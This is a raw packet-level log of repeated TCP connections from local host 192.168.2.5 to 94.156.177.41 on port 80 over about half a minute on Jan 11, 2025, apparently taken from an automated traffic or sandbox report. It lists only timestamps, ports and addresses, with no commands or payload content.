Jan 11, 2025 07:45:40.857131958 CET	50061	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:40.862059116 CET	80	50061	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:41.002923012 CET	50062	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:41.007941961 CET	80	50062	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:41.008064985 CET	50062	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:41.010130882 CET	50062	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:41.014986038 CET	80	50062	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:41.015054941 CET	50062	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:41.019908905 CET	80	50062	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:41.732707024 CET	80	50062	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:41.732758045 CET	80	50062	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:41.732825994 CET	50062	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:41.733335018 CET	50062	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:41.738183022 CET	80	50062	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.020072937 CET	50063	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.025312901 CET	80	50063	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.025405884 CET	50063	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.027710915 CET	50063	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.032545090 CET	80	50063	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.032602072 CET	50063	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.038292885 CET	80	50063	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.753599882 CET	80	50063	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.753628969 CET	80	50063	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.753856897 CET	50063	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.753856897 CET	50063	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.758764029 CET	80	50063	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.893187046 CET	50064	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.898077965 CET	80	50064	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.898180008 CET	50064	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.900111914 CET	50064	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.904880047 CET	80	50064	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:42.904942036 CET	50064	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:42.909740925 CET	80	50064	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:43.607815027 CET	80	50064	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:43.607935905 CET	50064	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:43.607980013 CET	80	50064	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:43.608109951 CET	50064	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:43.612905979 CET	80	50064	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:43.749835014 CET	50065	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:43.754947901 CET	80	50065	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:43.755048037 CET	50065	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:43.756759882 CET	50065	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:43.761627913 CET	80	50065	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:43.761689901 CET	50065	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:43.766545057 CET	80	50065	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:44.450850010 CET	80	50065	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:44.450930119 CET	80	50065	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:44.450979948 CET	50065	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:44.452527046 CET	50065	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:44.457375050 CET	80	50065	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:44.709525108 CET	50066	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:44.714390993 CET	80	50066	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:44.714453936 CET	50066	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:44.716214895 CET	50066	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:44.721084118 CET	80	50066	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:44.721123934 CET	50066	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:44.725927114 CET	80	50066	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:45.428601027 CET	80	50066	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:45.428740978 CET	80	50066	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:45.428850889 CET	50066	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:45.428953886 CET	50066	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:45.434017897 CET	80	50066	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:45.575958967 CET	50067	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:45.580887079 CET	80	50067	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:45.583641052 CET	50067	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:45.585752010 CET	50067	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:45.591377974 CET	80	50067	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:45.593770027 CET	50067	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:45.599294901 CET	80	50067	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:46.295394897 CET	80	50067	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:46.295559883 CET	80	50067	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:46.295557976 CET	50067	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:46.295612097 CET	50067	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:46.300520897 CET	80	50067	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:46.439114094 CET	50068	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:46.444118977 CET	80	50068	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:46.444355011 CET	50068	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:46.445966005 CET	50068	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:46.450824022 CET	80	50068	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:46.450872898 CET	50068	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:46.455679893 CET	80	50068	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:47.179929018 CET	80	50068	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:47.180058002 CET	80	50068	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:47.180099010 CET	50068	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:47.180146933 CET	50068	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:47.185004950 CET	80	50068	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:47.327800989 CET	50069	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:47.333647013 CET	80	50069	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:47.333743095 CET	50069	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:47.335490942 CET	50069	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:47.341535091 CET	80	50069	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:47.341626883 CET	50069	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:47.347492933 CET	80	50069	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.061913013 CET	80	50069	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.061980009 CET	80	50069	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.062041044 CET	50069	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.064600945 CET	50069	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.069426060 CET	80	50069	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.210484982 CET	50070	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.215521097 CET	80	50070	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.215596914 CET	50070	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.217773914 CET	50070	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.222642899 CET	80	50070	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.223334074 CET	50070	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.228202105 CET	80	50070	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.926311970 CET	80	50070	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.926424980 CET	50070	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.926523924 CET	80	50070	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:48.926574945 CET	50070	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:48.931273937 CET	80	50070	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.091229916 CET	50071	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.096185923 CET	80	50071	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.096263885 CET	50071	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.098901033 CET	50071	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.103717089 CET	80	50071	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.103766918 CET	50071	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.108566999 CET	80	50071	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.823978901 CET	80	50071	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.824114084 CET	50071	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.824139118 CET	80	50071	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.824199915 CET	50071	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.828969955 CET	80	50071	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.987873077 CET	50072	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.992822886 CET	80	50072	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.992911100 CET	50072	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.995032072 CET	50072	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:49.999834061 CET	80	50072	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:49.999888897 CET	50072	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.004770041 CET	80	50072	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:50.734549999 CET	80	50072	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:50.734605074 CET	80	50072	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:50.734862089 CET	50072	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.734862089 CET	50072	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.739819050 CET	80	50072	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:50.885554075 CET	50073	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.890604973 CET	80	50073	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:50.890701056 CET	50073	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.892791986 CET	50073	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.897685051 CET	80	50073	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:50.897746086 CET	50073	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:50.902565002 CET	80	50073	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:51.619489908 CET	80	50073	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:51.619549990 CET	80	50073	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:51.619631052 CET	50073	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:51.619673014 CET	50073	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:51.624640942 CET	80	50073	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:51.755426884 CET	50074	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:51.760658026 CET	80	50074	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:51.760759115 CET	50074	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:51.762840986 CET	50074	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:51.767720938 CET	80	50074	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:51.767771959 CET	50074	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:51.772600889 CET	80	50074	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:52.455550909 CET	80	50074	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:52.455585957 CET	80	50074	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:52.455713987 CET	50074	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:52.455760002 CET	50074	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:52.460685015 CET	80	50074	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:52.597827911 CET	50075	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:52.602900982 CET	80	50075	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:52.603030920 CET	50075	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:52.605214119 CET	50075	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:52.610270977 CET	80	50075	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:52.610435009 CET	50075	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:52.615462065 CET	80	50075	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:53.300391912 CET	80	50075	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:53.300422907 CET	80	50075	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:53.300649881 CET	50075	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:53.304754019 CET	50075	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:53.309653997 CET	80	50075	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:53.645412922 CET	50076	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:53.840755939 CET	80	50076	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:53.841018915 CET	50076	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:53.842950106 CET	50076	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:53.849438906 CET	80	50076	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:53.849528074 CET	50076	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:53.855739117 CET	80	50076	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:54.575973988 CET	80	50076	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:54.576098919 CET	80	50076	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:54.576108932 CET	50076	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:54.576277018 CET	50076	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:54.581020117 CET	80	50076	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:54.720597029 CET	50077	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:54.726603985 CET	80	50077	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:54.726769924 CET	50077	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:54.728818893 CET	50077	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:54.733728886 CET	80	50077	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:54.733798981 CET	50077	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:54.738898993 CET	80	50077	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:55.483252048 CET	80	50077	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:55.483299971 CET	80	50077	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:55.483383894 CET	50077	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:55.483422041 CET	50077	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:55.488281965 CET	80	50077	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:55.626281023 CET	50078	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:55.631242990 CET	80	50078	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:55.631454945 CET	50078	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:55.633569956 CET	50078	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:55.638498068 CET	80	50078	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:55.638595104 CET	50078	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:55.643431902 CET	80	50078	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:56.355166912 CET	80	50078	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:56.355282068 CET	50078	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:56.355349064 CET	80	50078	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:56.355402946 CET	50078	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:56.360183954 CET	80	50078	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:56.502516985 CET	50079	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:56.507462978 CET	80	50079	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:56.507575989 CET	50079	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:56.509545088 CET	50079	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:56.514377117 CET	80	50079	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:56.514452934 CET	50079	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:56.519242048 CET	80	50079	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:57.212044001 CET	80	50079	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:57.212059975 CET	80	50079	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:57.212131023 CET	50079	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:57.212184906 CET	50079	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:57.216969013 CET	80	50079	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:57.351754904 CET	50080	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:57.356693029 CET	80	50080	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:57.356760025 CET	50080	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:57.359915018 CET	50080	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:57.364713907 CET	80	50080	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:57.364759922 CET	50080	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:57.369604111 CET	80	50080	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:58.216295958 CET	80	50080	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:58.216340065 CET	80	50080	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:58.216432095 CET	50080	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:58.216464996 CET	50080	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:58.221304893 CET	80	50080	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:58.368801117 CET	50081	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:58.375438929 CET	80	50081	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:58.375574112 CET	50081	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:58.377670050 CET	50081	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:58.382466078 CET	80	50081	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:58.382541895 CET	50081	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:58.387361050 CET	80	50081	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.120776892 CET	80	50081	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.120917082 CET	50081	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.120937109 CET	80	50081	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.120990992 CET	50081	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.125812054 CET	80	50081	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.287523031 CET	50082	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.292659044 CET	80	50082	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.292766094 CET	50082	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.294701099 CET	50082	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.299592972 CET	80	50082	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.299658060 CET	50082	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.304491997 CET	80	50082	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.986650944 CET	80	50082	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.986913919 CET	50082	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.986926079 CET	80	50082	94.156.177.41	192.168.2.5
Jan 11, 2025 07:45:59.986968040 CET	50082	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:45:59.991781950 CET	80	50082	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.133912086 CET	50083	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.138711929 CET	80	50083	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.139008999 CET	50083	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.140888929 CET	50083	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.145700932 CET	80	50083	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.145771027 CET	50083	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.153525114 CET	80	50083	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.838119984 CET	80	50083	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.838212967 CET	80	50083	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.838212967 CET	50083	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.838263988 CET	50083	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.843255997 CET	80	50083	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.969424009 CET	50084	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.974391937 CET	80	50084	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.974487066 CET	50084	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.976548910 CET	50084	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.982064009 CET	80	50084	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:00.982125998 CET	50084	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:00.987638950 CET	80	50084	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:01.716804028 CET	80	50084	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:01.716881037 CET	80	50084	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:01.716963053 CET	50084	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:01.716964006 CET	50084	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:01.721808910 CET	80	50084	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:01.860291958 CET	50085	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:01.865700006 CET	80	50085	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:01.865856886 CET	50085	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:01.867796898 CET	50085	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:01.873338938 CET	80	50085	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:01.873444080 CET	50085	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:01.878760099 CET	80	50085	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:02.578923941 CET	80	50085	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:02.578975916 CET	80	50085	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:02.579117060 CET	50085	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:02.579160929 CET	50085	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:02.584110022 CET	80	50085	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:02.835782051 CET	50086	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:02.840729952 CET	80	50086	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:02.840945959 CET	50086	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:02.868691921 CET	50086	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:02.873605967 CET	80	50086	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:02.873702049 CET	50086	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:02.878551006 CET	80	50086	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:03.569354057 CET	80	50086	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:03.569545031 CET	80	50086	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:03.569616079 CET	50086	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:03.569616079 CET	50086	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:03.574476004 CET	80	50086	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:03.710189104 CET	50087	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:03.715192080 CET	80	50087	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:03.715342045 CET	50087	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:03.717689037 CET	50087	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:03.722620964 CET	80	50087	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:03.722759962 CET	50087	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:03.728307009 CET	80	50087	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:04.428982973 CET	80	50087	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:04.429112911 CET	80	50087	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:04.429246902 CET	50087	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:04.429246902 CET	50087	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:04.434202909 CET	80	50087	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:04.588176012 CET	50088	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:04.593384981 CET	80	50088	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:04.595720053 CET	50088	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:04.598776102 CET	50088	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:04.603635073 CET	80	50088	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:04.607701063 CET	50088	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:04.612580061 CET	80	50088	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:05.309093952 CET	80	50088	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:05.309142113 CET	80	50088	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:05.309227943 CET	50088	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:05.309320927 CET	50088	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:05.316509962 CET	80	50088	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:05.476838112 CET	50089	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:05.482099056 CET	80	50089	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:05.482187986 CET	50089	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:05.485071898 CET	50089	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:05.489932060 CET	80	50089	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:05.489995956 CET	50089	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:05.494848967 CET	80	50089	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:06.195997953 CET	80	50089	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:06.196053028 CET	80	50089	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:06.196145058 CET	50089	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:06.197735071 CET	50089	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:06.202584028 CET	80	50089	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:06.340749979 CET	50090	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:06.345776081 CET	80	50090	94.156.177.41	192.168.2.5
